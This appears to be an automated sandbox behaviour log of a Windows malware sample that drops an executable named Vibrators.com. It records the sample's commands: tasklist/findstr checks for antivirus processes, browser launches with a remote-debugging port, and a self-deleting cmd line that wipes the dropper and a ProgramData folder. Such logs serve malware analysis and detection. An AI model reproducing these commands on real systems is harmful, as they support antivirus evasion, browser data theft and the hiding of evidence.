Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2044,i,15636258417430532003,11558248929672306327,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2460,i,15708646645341395724,7971815597723476352,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5636 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\415434\Vibrators.com" & rd /s /q "C:\ProgramData\WBIEKNG4E3WB" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Adjacent Adjacent.cmd & Adjacent.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 415434	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Analyze" Arabic	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Reflected + ..\Subdivision + ..\Change + ..\Checked o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com Vibrators.com o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\415434\Vibrators.com" & rd /s /q "C:\ProgramData\WBIEKNG4E3WB" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=1988,i,7571485263199981070,11501263835013036309,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2812 --field-trial-handle=2520,i,303125913703440342,5402026303497311183,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2044,i,15636258417430532003,11558248929672306327,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2580 --field-trial-handle=2460,i,15708646645341395724,7971815597723476352,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5636 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1976,i,13259116394525614172,17189080494392434811,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QIo3SytSZA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Drive.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.15.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: QIo3SytSZA.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\QIo3SytSZA.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: QIo3SytSZA.exe

Static PE information: real checksum: 0xd6fa7 should be: 0xd8ddc

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Code function: 11_2_00A10DE6 push ecx; ret

11_2_00A10DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
